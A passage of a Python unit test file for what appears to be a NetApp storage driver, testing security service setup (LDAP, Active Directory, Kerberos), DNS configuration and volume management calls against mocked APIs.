self.client.setup_security_services([fake.CIFS_SECURITY_SERVICE],
self.vserver_client,
fake.VSERVER_NAME)
vserver_modify_args = {
'name-mapping-switch': [
{'nmswitch': 'ldap'},
{'nmswitch': 'file'},
],
'name-server-switch': [
{'nsswitch': 'ldap'},
{'nsswitch': 'file'},
],
'vserver-name': fake.VSERVER_NAME
}
self.client.send_request.assert_has_calls([
mock.call('vserver-modify', vserver_modify_args)])
self.vserver_client.configure_active_directory.assert_has_calls([
mock.call(fake.CIFS_SECURITY_SERVICE, fake.VSERVER_NAME)])
def test_setup_security_services_kerberos(self):
self.mock_object(self.client, 'send_request')
self.mock_object(self.client, 'create_kerberos_realm')
self.mock_object(self.vserver_client, 'configure_kerberos')
self.client.setup_security_services([fake.KERBEROS_SECURITY_SERVICE],
self.vserver_client,
fake.VSERVER_NAME)
vserver_modify_args = {
'name-mapping-switch': [
{'nmswitch': 'ldap'},
{'nmswitch': 'file'},
],
'name-server-switch': [
{'nsswitch': 'ldap'},
{'nsswitch': 'file'},
],
'vserver-name': fake.VSERVER_NAME
}
self.client.send_request.assert_has_calls([
mock.call('vserver-modify', vserver_modify_args)])
self.client.create_kerberos_realm.assert_has_calls([
mock.call(fake.KERBEROS_SECURITY_SERVICE)])
self.vserver_client.configure_kerberos.assert_has_calls([
mock.call(fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME)])
def test_setup_security_services_invalid(self):
self.mock_object(self.client, 'send_request')
self.assertRaises(exception.NetAppException,
self.client.setup_security_services,
[fake.INVALID_SECURITY_SERVICE],
self.vserver_client,
fake.VSERVER_NAME)
vserver_modify_args = {
'name-mapping-switch': [
{'nmswitch': 'ldap'},
{'nmswitch': 'file'},
],
'name-server-switch': [
{'nsswitch': 'ldap'},
{'nsswitch': 'file'},
],
'vserver-name': fake.VSERVER_NAME
}
self.client.send_request.assert_has_calls([
mock.call('vserver-modify', vserver_modify_args)])
def test_enable_nfs(self):
self.mock_object(self.client, 'send_request')
self.client.enable_nfs()
nfs_service_modify_args = {'is-nfsv40-enabled': 'true'}
export_rule_create_args = {
'client-match': '0.0.0.0/0',
'policy-name': 'default',
'ro-rule': {
'security-flavor': 'any'
},
'rw-rule': {
'security-flavor': 'never'
}
}
self.client.send_request.assert_has_calls([
mock.call('nfs-enable'),
mock.call('nfs-service-modify', nfs_service_modify_args),
mock.call('export-rule-create', export_rule_create_args)])
def test_configure_ldap(self):
self.mock_object(self.client, 'send_request')
self.client.configure_ldap(fake.LDAP_SECURITY_SERVICE)
config_name = hashlib.md5(
six.b(fake.LDAP_SECURITY_SERVICE['id'])).hexdigest()
ldap_client_create_args = {
'ldap-client-config': config_name,
'servers': {'ip-address': fake.LDAP_SECURITY_SERVICE['server']},
'tcp-port': '389',
'schema': 'RFC-2307',
'bind-password': fake.LDAP_SECURITY_SERVICE['password']
}
ldap_config_create_args = {
'client-config': config_name,
'client-enabled': 'true'
}
self.client.send_request.assert_has_calls([
mock.call('ldap-client-create', ldap_client_create_args),
mock.call('ldap-config-create', ldap_config_create_args)])
def test_configure_active_directory(self):
self.mock_object(self.client, 'send_request')
self.mock_object(self.client, 'configure_dns')
self.client.configure_active_directory(fake.CIFS_SECURITY_SERVICE,
fake.VSERVER_NAME)
cifs_server = (
fake.VSERVER_NAME[0:7] + '..' + fake.VSERVER_NAME[-6:]).upper()
cifs_server_create_args = {
'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
'force-account-overwrite': 'true',
'cifs-server': cifs_server,
'domain': fake.CIFS_SECURITY_SERVICE['domain'],
}
self.client.configure_dns.assert_called_with(
fake.CIFS_SECURITY_SERVICE)
self.client.send_request.assert_has_calls([
mock.call('cifs-server-create', cifs_server_create_args)])
def test_configure_active_directory_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.mock_object(self.client, 'configure_dns')
self.assertRaises(exception.NetAppException,
self.client.configure_active_directory,
fake.CIFS_SECURITY_SERVICE,
fake.VSERVER_NAME)
def test_create_kerberos_realm(self):
self.mock_object(self.client, 'send_request')
self.client.create_kerberos_realm(fake.KERBEROS_SECURITY_SERVICE)
kerberos_realm_create_args = {
'admin-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
'admin-server-port': '749',
'clock-skew': '5',
'comment': '',
'config-name': fake.KERBEROS_SECURITY_SERVICE['id'],
'kdc-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
'kdc-port': '88',
'kdc-vendor': 'other',
'password-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
'password-server-port': '464',
'realm': fake.KERBEROS_SECURITY_SERVICE['domain'].upper()
}
self.client.send_request.assert_has_calls([
mock.call('kerberos-realm-create', kerberos_realm_create_args)])
def test_create_kerberos_realm_already_present(self):
self.mock_object(self.client,
'send_request',
self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
self.client.create_kerberos_realm(fake.KERBEROS_SECURITY_SERVICE)
kerberos_realm_create_args = {
'admin-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
'admin-server-port': '749',
'clock-skew': '5',
'comment': '',
'config-name': fake.KERBEROS_SECURITY_SERVICE['id'],
'kdc-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
'kdc-port': '88',
'kdc-vendor': 'other',
'password-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
'password-server-port': '464',
'realm': fake.KERBEROS_SECURITY_SERVICE['domain'].upper()
}
self.client.send_request.assert_has_calls([
mock.call('kerberos-realm-create', kerberos_realm_create_args)])
self.assertEqual(1, client_cmode.LOG.debug.call_count)
def test_create_kerberos_realm_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(exception.NetAppException,
self.client.create_kerberos_realm,
fake.KERBEROS_SECURITY_SERVICE)
def test_configure_kerberos(self):
self.mock_object(self.client, 'send_request')
self.mock_object(self.client, 'configure_dns')
self.mock_object(self.client,
'list_network_interfaces',
mock.Mock(return_value=['lif1', 'lif2']))
self.client.configure_kerberos(
fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME)
spn = self.client._get_kerberos_service_principal_name(
fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME)
kerberos_config_modify_args1 = {
'admin-password': fake.KERBEROS_SECURITY_SERVICE['password'],
'admin-user-name': fake.KERBEROS_SECURITY_SERVICE['user'],
'interface-name': 'lif1',
'is-kerberos-enabled': 'true',
'service-principal-name': spn
}
kerberos_config_modify_args2 = {
'admin-password': fake.KERBEROS_SECURITY_SERVICE['password'],
'admin-user-name': fake.KERBEROS_SECURITY_SERVICE['user'],
'interface-name': 'lif2',
'is-kerberos-enabled': 'true',
'service-principal-name': spn
}
self.client.configure_dns.assert_called_with(
fake.KERBEROS_SECURITY_SERVICE)
self.client.send_request.assert_has_calls([
mock.call('kerberos-config-modify',
kerberos_config_modify_args1),
mock.call('kerberos-config-modify',
kerberos_config_modify_args2)])
def test_configure_kerberos_no_network_interfaces(self):
self.mock_object(self.client, 'send_request')
self.mock_object(self.client, 'configure_dns')
self.mock_object(self.client,
'list_network_interfaces',
mock.Mock(return_value=[]))
self.assertRaises(exception.NetAppException,
self.client.configure_kerberos,
fake.KERBEROS_SECURITY_SERVICE,
fake.VSERVER_NAME)
self.client.configure_dns.assert_called_with(
fake.KERBEROS_SECURITY_SERVICE)
def test_get_kerberos_service_principal_name(self):
spn = self.client._get_kerberos_service_principal_name(
fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME
)
self.assertEqual(fake.KERBEROS_SERVICE_PRINCIPAL_NAME, spn)
def test_configure_dns_for_active_directory(self):
self.mock_object(self.client, 'send_request')
self.client.configure_dns(fake.CIFS_SECURITY_SERVICE)
net_dns_create_args = {
'domains': {'string': fake.CIFS_SECURITY_SERVICE['domain']},
'name-servers': {
'ip-address': fake.CIFS_SECURITY_SERVICE['dns_ip']
},
'dns-state': 'enabled'
}
self.client.send_request.assert_has_calls([
mock.call('net-dns-create', net_dns_create_args)])
def test_configure_dns_for_kerberos(self):
self.mock_object(self.client, 'send_request')
self.client.configure_dns(fake.KERBEROS_SECURITY_SERVICE)
net_dns_create_args = {
'domains': {'string': fake.KERBEROS_SECURITY_SERVICE['domain']},
'name-servers': {
'ip-address': fake.KERBEROS_SECURITY_SERVICE['dns_ip']
},
'dns-state': 'enabled'
}
self.client.send_request.assert_has_calls([
mock.call('net-dns-create', net_dns_create_args)])
def test_configure_dns_already_present(self):
self.mock_object(self.client,
'send_request',
self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
self.client.configure_dns(fake.KERBEROS_SECURITY_SERVICE)
net_dns_create_args = {
'domains': {'string': fake.KERBEROS_SECURITY_SERVICE['domain']},
'name-servers': {
'ip-address': fake.KERBEROS_SECURITY_SERVICE['dns_ip']
},
'dns-state': 'enabled'
}
self.client.send_request.assert_has_calls([
mock.call('net-dns-create', net_dns_create_args)])
self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_configure_dns_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(exception.NetAppException,
self.client.configure_dns,
fake.KERBEROS_SECURITY_SERVICE)
def test_create_volume(self):
self.mock_object(self.client, 'send_request')
self.client.create_volume(
fake.SHARE_AGGREGATE_NAME, fake.SHARE_NAME, 100)
volume_create_args = {
'containing-aggr-name': fake.SHARE_AGGREGATE_NAME,
'size': '100g',
'volume': fake.SHARE_NAME,
'volume-type': 'rw',
'junction-path': '/%s' % fake.SHARE_NAME,
}
self.client.send_request.assert_called_once_with('volume-create',
volume_create_args)
def test_create_volume_with_extra_specs(self):
self.mock_object(self.client, 'set_volume_max_files')
self.mock_object(self.client, 'enable_dedup')
self.mock_object(self.client, 'enable_compression')
self.mock_object(self.client, 'send_request')
self.client.create_volume(
fake.SHARE_AGGREGATE_NAME, fake.SHARE_NAME, 100,
thin_provisioned=True, language='en-US',
snapshot_policy='default', dedup_enabled=True,
compression_enabled=True, max_files=5000, snapshot_reserve=15)
volume_create_args = {
'containing-aggr-name': fake.SHARE_AGGREGATE_NAME,
'size': '100g',
'volume': fake.SHARE_NAME,
'junction-path': '/%s' % fake.SHARE_NAME,
'space-reserve': 'none',
'language-code': 'en-US',
'volume-type': 'rw',
'snapshot-policy': 'default',
'percentage-snapshot-reserve': '15',
}
self.client.send_request.assert_called_with('volume-create',
volume_create_args)
self.client.set_volume_max_files.assert_called_once_with(
fake.SHARE_NAME, fake.MAX_FILES)
self.client.enable_dedup.assert_called_once_with(fake.SHARE_NAME)
self.client.enable_compression.assert_called_once_with(fake.SHARE_NAME)
def test_enable_dedup(self):
self.mock_object(self.client, 'send_request')
self.client.enable_dedup(fake.SHARE_NAME)
sis_enable_args = {'path': '/vol/%s' % fake.SHARE_NAME}
self.client.send_request.assert_called_once_with('sis-enable',
sis_enable_args)
def test_disable_dedup(self):
self.mock_object(self.client, 'send_request')
self.client.disable_dedup(fake.SHARE_NAME)
sis_disable_args = {'path': '/vol/%s' % fake.SHARE_NAME}
self.client.send_request.assert_called_once_with('sis-disable',
sis_disable_args)
def test_enable_compression(self):
self.mock_object(self.client, 'send_request')
self.client.enable_compression(fake.SHARE_NAME)
sis_set_config_args = {
'path': '/vol/%s' % fake.SHARE_NAME,
'enable-compression': 'true'
}
self.client.send_request.assert_called_once_with('sis-set-config',
sis_set_config_args)
def test_disable_compression(self):
self.mock_object(self.client, 'send_request')
self.client.disable_compression(fake.SHARE_NAME)
sis_set_config_args = {
'path': '/vol/%s' % fake.SHARE_NAME,
'enable-compression': 'false'
}
self.client.send_request.assert_called_once_with('sis-set-config',
sis_set_config_args)
def test_get_volume_efficiency_status(self):
api_response = netapp_api.NaElement(fake.SIS_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_volume_efficiency_status(fake.SHARE_NAME)
sis_get_iter_args = {
'query': {
'sis-status-info': {
'path': '/vol/%s' % fake.SHARE_NAME,
},
},
'desired-attributes': {
'sis-status-info': {
'state': None,
'is-compression-enabled': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('sis-get-iter', sis_get_iter_args)])
expected = {'dedupe': True, 'compression': True}
self.assertDictEqual(expected, result)
def test_get_volume_efficiency_status_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_volume_efficiency_status(fake.SHARE_NAME)
expected = {'dedupe': False, 'compression': False}
self.assertDictEqual(expected, result)
def test_set_volume_max_files(self):
self.mock_object(self.client, 'send_request')
self.client.set_volume_max_files(fake.SHARE_NAME, fake.MAX_FILES)
volume_modify_iter_api_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'name': fake.SHARE_NAME,
},
},
},
'attributes': {
'volume-attributes': {
'volume-inode-attributes': {
'files-total': fake.MAX_FILES,
},
},
},
}
self.client.send_request.assert_called_once_with(
'volume-modify-iter', volume_modify_iter_api_args)
def test_set_volume_name(self):
self.mock_object(self.client, 'send_request')
self.client.set_volume_name(fake.SHARE_NAME, 'new_name')
volume_rename_api_args = {
'volume': fake.SHARE_NAME,
'new-volume-name': 'new_name',
}
self.client.send_request.assert_called_once_with(
'volume-rename', volume_rename_api_args)
def test_manage_volume_no_optional_args(self):
self.mock_object(self.client, 'send_request')
mock_update_volume_efficiency_attributes = self.mock_object(
self.client, 'update_volume_efficiency_attributes')
self.client.manage_volume(fake.SHARE_AGGREGATE_NAME, fake.SHARE_NAME)
volume_modify_iter_api_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'containing-aggregate-name': fake.SHARE_AGGREGATE_NAME,
'name': fake.SHARE_NAME,
},
},
},
'attributes': {
'volume-attributes': {
'volume-inode-attributes': {},
'volume-language-attributes': {},
'volume-snapshot-attributes': {},
'volume-space-attributes': {
'space-guarantee': 'volume',
},
},
},
}
self.client.send_request.assert_called_once_with(
'volume-modify-iter', volume_modify_iter_api_args)
mock_update_volume_efficiency_attributes.assert_called_once_with(
fake.SHARE_NAME, False, False)
def test_manage_volume_all_optional_args(self):
self.mock_object(self.client, 'send_request')
mock_update_volume_efficiency_attributes = self.mock_object(
self.client, 'update_volume_efficiency_attributes')
self.client.manage_volume(fake.SHARE_AGGREGATE_NAME,
fake.SHARE_NAME,
thin_provisioned=True,
snapshot_policy=fake.SNAPSHOT_POLICY_NAME,
language=fake.LANGUAGE,
dedup_enabled=True,
compression_enabled=False,
max_files=fake.MAX_FILES)
volume_modify_iter_api_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'containing-aggregate-name': fake.SHARE_AGGREGATE_NAME,
'name': fake.SHARE_NAME,
},
},
},
'attributes': {
'volume-attributes': {
'volume-inode-attributes': {
'files-total': fake.MAX_FILES,
},
'volume-language-attributes': {
'language': fake.LANGUAGE,
},
'volume-snapshot-attributes': {
'snapshot-policy': fake.SNAPSHOT_POLICY_NAME,
},
'volume-space-attributes': {
'space-guarantee': 'none',
},
},
},
}
self.client.send_request.assert_called_once_with(
'volume-modify-iter', volume_modify_iter_api_args)
mock_update_volume_efficiency_attributes.assert_called_once_with(
fake.SHARE_NAME, True, False)
@ddt.data(
{'existing': (True, True), 'desired': (True, True)},
{'existing': (True, True), 'desired': (False, False)},
{'existing': (True, True), 'desired': (True, False)},
{'existing': (True, False), 'desired': (True, False)},
{'existing': (True, False), 'desired': (False, False)},
{'existing': (True, False), 'desired': (True, True)},
{'existing': (False, False), 'desired': (False, False)},
{'existing': (False, False), 'desired': (True, False)},
{'existing': (False, False), 'desired': (True, True)},
)
@ddt.unpack
def test_update_volume_efficiency_attributes(self, existing, desired):
existing_dedupe = existing[0]
existing_compression = existing[1]
desired_dedupe = desired[0]
desired_compression = desired[1]
self.mock_object(
self.client,
'get_volume_efficiency_status',
mock.Mock(return_value={'dedupe': existing_dedupe,
'compression': existing_compression}))
mock_enable_compression = self.mock_object(self.client,
'enable_compression')
mock_disable_compression = self.mock_object(self.client,
'disable_compression')
mock_enable_dedup = self.mock_object(self.client, 'enable_dedup')
mock_disable_dedup = self.mock_object(self.client, 'disable_dedup')
self.client.update_volume_efficiency_attributes(
fake.SHARE_NAME, desired_dedupe, desired_compression)
if existing_dedupe == desired_dedupe:
self.assertFalse(mock_enable_dedup.called)
self.assertFalse(mock_disable_dedup.called)
elif existing_dedupe and not desired_dedupe:
self.assertFalse(mock_enable_dedup.called)
self.assertTrue(mock_disable_dedup.called)
elif not existing_dedupe and desired_dedupe:
self.assertTrue(mock_enable_dedup.called)
self.assertFalse(mock_disable_dedup.called)
if existing_compression == desired_compression:
self.assertFalse(mock_enable_compression.called)
self.assertFalse(mock_disable_compression.called)
elif existing_compression and not desired_compression:
self.assertFalse(mock_enable_compression.called)
self.assertTrue(mock_disable_compression.called)
elif not existing_compression and desired_compression:
self.assertTrue(mock_enable_compression.called)
self.assertFalse(mock_disable_compression.called)
def test_set_volume_size(self):
api_response = netapp_api.NaElement(fake.VOLUME_MODIFY_ITER_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.client.set_volume_size(fake.SHARE_NAME, 10)
volume_modify_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'name': fake.SHARE_NAME
}
}
},
'attributes': {
'volume-attributes': {
'volume-space-attributes': {
'size': 10737418240,
},
},
},
}
self.client.send_request.assert_has_calls([
mock.call('volume-modify-iter', volume_modify_iter_args)])
def test_set_volume_size_api_error(self):
api_response = netapp_api.NaElement(
fake.VOLUME_MODIFY_ITER_ERROR_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertRaises(netapp_api.NaApiError,
self.client.set_volume_size,
fake.SHARE_NAME,
10)
def test_volume_exists(self):
api_response = netapp_api.NaElement(fake.VOLUME_GET_NAME_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.volume_exists(fake.SHARE_NAME)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'name': fake.SHARE_NAME
}
}
},
'desired-attributes': {
'volume-attributes': {
'volume-id-attributes': {
'name': None
}
}
}
}
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
self.assertTrue(result)
def test_volume_exists_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertFalse(self.client.volume_exists(fake.SHARE_NAME))
def test_snapshot_exists(self):
api_response = netapp_api.NaElement(fake.VOLUME_GET_NAME_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.snapshot_exists(fake.SNAPSHOT_NAME,
fake.SHARE_NAME)
snapshot_get_iter_args = {
'query': {
'snapshot-info': {
'name': fake.SNAPSHOT_NAME,
'volume': fake.SHARE_NAME,
}
},
'desired-attributes': {
'snapshot-info': {
'name': None,
'volume': None,
'busy': None,
'snapshot-owners-list': {
'snapshot-owner': None,
}
}
}
}
self.client.send_request.assert_has_calls([
mock.call('snapshot-get-iter', snapshot_get_iter_args)])
self.assertTrue(result)
def test_snapshot_exists_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertFalse(self.client.snapshot_exists(fake.SNAPSHOT_NAME,
fake.SHARE_NAME))
@ddt.data({
'api_response_xml': fake.SNAPSHOT_GET_ITER_UNAVAILABLE_RESPONSE,
'raised_exception': exception.SnapshotUnavailable,
}, {
'api_response_xml': fake.SNAPSHOT_GET_ITER_OTHER_ERROR_RESPONSE,
'raised_exception': exception.NetAppException,
})
@ddt.unpack
def test_snapshot_exists_error(self, api_response_xml, raised_exception):
api_response = netapp_api.NaElement(api_response_xml)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertRaises(raised_exception,
self.client.snapshot_exists,
fake.SNAPSHOT_NAME,
fake.SHARE_NAME)
def test_get_aggregate_for_volume(self):
api_response = netapp_api.NaElement(
fake.GET_AGGREGATE_FOR_VOLUME_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_for_volume(fake.SHARE_NAME)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'name': fake.SHARE_NAME
}
}
},
'desired-attributes': {
'volume-attributes': {
'volume-id-attributes': {
'containing-aggregate-name': None,
'name': None
}
}
}
}
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
self.assertEqual(fake.SHARE_AGGREGATE_NAME, result)
def test_get_aggregate_for_volume_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client.get_aggregate_for_volume,
fake.SHARE_NAME)
def test_volume_has_luns(self):
api_response = netapp_api.NaElement(fake.LUN_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.volume_has_luns(fake.SHARE_NAME)
lun_get_iter_args = {
'query': {
'lun-info': {
'volume': fake.SHARE_NAME,
},
},
'desired-attributes': {
'lun-info': {
'path': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('lun-get-iter', lun_get_iter_args)])
self.assertTrue(result)
def test_volume_has_luns_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.volume_has_luns(fake.SHARE_NAME)
self.assertFalse(result)
def test_volume_has_junctioned_volumes(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_ITER_JUNCTIONED_VOLUMES_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
fake_junction_path = '/%s' % fake.SHARE_NAME
self.mock_object(self.client,
'get_volume_junction_path',
mock.Mock(return_value=fake_junction_path))
result = self.client.volume_has_junctioned_volumes(fake.SHARE_NAME)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'junction-path': fake_junction_path + '/*',
},
},
},
'desired-attributes': {
'volume-attributes': {
'volume-id-attributes': {
'name': None,
},
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
self.assertTrue(result)
def test_volume_has_junctioned_volumes_no_junction_path(self):
self.mock_object(self.client,
'get_volume_junction_path',
mock.Mock(return_value=''))
result = self.client.volume_has_junctioned_volumes(fake.SHARE_NAME)
self.assertFalse(result)
def test_volume_has_junctioned_volumes_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
fake_junction_path = '/%s' % fake.SHARE_NAME
self.mock_object(self.client,
'get_volume_junction_path',
mock.Mock(return_value=fake_junction_path))
result = self.client.volume_has_junctioned_volumes(fake.SHARE_NAME)
self.assertFalse(result)
def test_get_volume_at_junction_path(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_ITER_VOLUME_TO_MANAGE_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
fake_junction_path = '/%s' % fake.SHARE_NAME
result = self.client.get_volume_at_junction_path(fake_junction_path)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'junction-path': fake_junction_path,
},
},
},
'desired-attributes': {
'volume-attributes': {
'volume-id-attributes': {
'containing-aggregate-name': None,
'junction-path': None,
'name': None,
'type': None,
'style': None,
},
'volume-space-attributes': {
'size': None,
}
},
},
}
expected = {
'aggregate': fake.SHARE_AGGREGATE_NAME,
'junction-path': fake_junction_path,
'name': fake.SHARE_NAME,
'type': 'rw',
'style': 'flex',
'size': fake.SHARE_SIZE,
}
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
self.assertDictEqual(expected, result)
def test_get_volume_at_junction_path_not_specified(self):
result = self.client.get_volume_at_junction_path(None)
self.assertIsNone(result)
def test_get_volume_at_junction_path_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
fake_junction_path = '/%s' % fake.SHARE_NAME
result = self.client.get_volume_at_junction_path(fake_junction_path)
self.assertIsNone(result)
def test_get_volume_to_manage(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_ITER_VOLUME_TO_MANAGE_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_volume_to_manage(fake.SHARE_AGGREGATE_NAME,
fake.SHARE_NAME)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'containing-aggregate-name': fake.SHARE_AGGREGATE_NAME,
'name': fake.SHARE_NAME,
},
},
},
'desired-attributes': {
'volume-attributes': {
'volume-id-attributes': {
'containing-aggregate-name': None,
'junction-path': None,
'name': None,
'type': None,
'style': None,
'owning-vserver-name': None,
},
'volume-space-attributes': {
'size': None,
}
},
},
}
expected = {
'aggregate': fake.SHARE_AGGREGATE_NAME,
'junction-path': '/%s' % fake.SHARE_NAME,
'name': fake.SHARE_NAME,
'type': 'rw',
'style': 'flex',
'size': fake.SHARE_SIZE,
'owning-vserver-name': fake.VSERVER_NAME
}
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
self.assertDictEqual(expected, result)
def test_get_volume_to_manage_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_volume_to_manage(fake.SHARE_AGGREGATE_NAME,
fake.SHARE_NAME)
self.assertIsNone(result)
def test_create_volume_clone(self):
self.mock_object(self.client, 'send_request')
self.client.create_volume_clone(fake.SHARE_NAME,
fake.PARENT_SHARE_NAME,
fake.PARENT_SNAPSHOT_NAME)
volume_clone_create_args = {
'volume': fake.SHARE_NAME,
'parent-volume': fake.PARENT_SHARE_NAME,
'parent-snapshot': fake.PARENT_SNAPSHOT_NAME,
'junction-path': '/%s' % fake.SHARE_NAME
}
self.client.send_request.assert_has_calls([
mock.call('volume-clone-create', volume_clone_create_args)])
@ddt.data(None,
mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.EVOL_CLONE_BEING_SPLIT)))
def test_split_volume_clone(self, side_effect):
self.mock_object(
self.client, 'send_request',
mock.Mock(side_effect=side_effect))
self.client.split_volume_clone(fake.SHARE_NAME)
volume_clone_split_args = {'volume': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('volume-clone-split-start', volume_clone_split_args)])
def test_split_volume_clone_api_error(self):
self.mock_object(self.client,
'send_request',
mock.Mock(side_effect=self._mock_api_error()))
self.assertRaises(netapp_api.NaApiError,
self.client.split_volume_clone,
fake.SHARE_NAME)
def test_get_clone_children_for_snapshot(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_ITER_CLONE_CHILDREN_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_clone_children_for_snapshot(
fake.SHARE_NAME, fake.SNAPSHOT_NAME)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-clone-attributes': {
'volume-clone-parent-attributes': {
'name': fake.SHARE_NAME,
'snapshot-name': fake.SNAPSHOT_NAME,
},
},
},
},
'desired-attributes': {
'volume-attributes': {
'volume-id-attributes': {
'name': None,
},
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
expected = [
{'name': fake.CLONE_CHILD_1},
{'name': fake.CLONE_CHILD_2},
]
self.assertEqual(expected, result)
def test_get_clone_children_for_snapshot_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_clone_children_for_snapshot(
fake.SHARE_NAME, fake.SNAPSHOT_NAME)
self.assertEqual([], result)
def test_get_volume_junction_path(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_VOLUME_PATH_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_volume_junction_path(fake.SHARE_NAME)
volume_get_volume_path_args = {
'volume': fake.SHARE_NAME,
'is-style-cifs': 'false'
}
self.client.send_request.assert_has_calls([
mock.call('volume-get-volume-path', volume_get_volume_path_args)])
self.assertEqual(fake.VOLUME_JUNCTION_PATH, result)
def test_get_volume_junction_path_cifs(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_VOLUME_PATH_CIFS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_volume_junction_path(fake.SHARE_NAME,
is_style_cifs=True)
volume_get_volume_path_args = {
'volume': fake.SHARE_NAME,
'is-style-cifs': 'true'
}
self.client.send_request.assert_has_calls([
mock.call('volume-get-volume-path', volume_get_volume_path_args)])
self.assertEqual(fake.VOLUME_JUNCTION_PATH_CIFS, result)
def test_mount_volume_default_junction_path(self):
self.mock_object(self.client, 'send_request')
self.client.mount_volume(fake.SHARE_NAME)
volume_mount_args = {
'volume-name': fake.SHARE_NAME,
'junction-path': '/%s' % fake.SHARE_NAME,
}
self.client.send_request.assert_has_calls([
mock.call('volume-mount', volume_mount_args)])
def test_mount_volume(self):
self.mock_object(self.client, 'send_request')
fake_path = '/fake_path'
self.client.mount_volume(fake.SHARE_NAME, junction_path=fake_path)
volume_mount_args = {
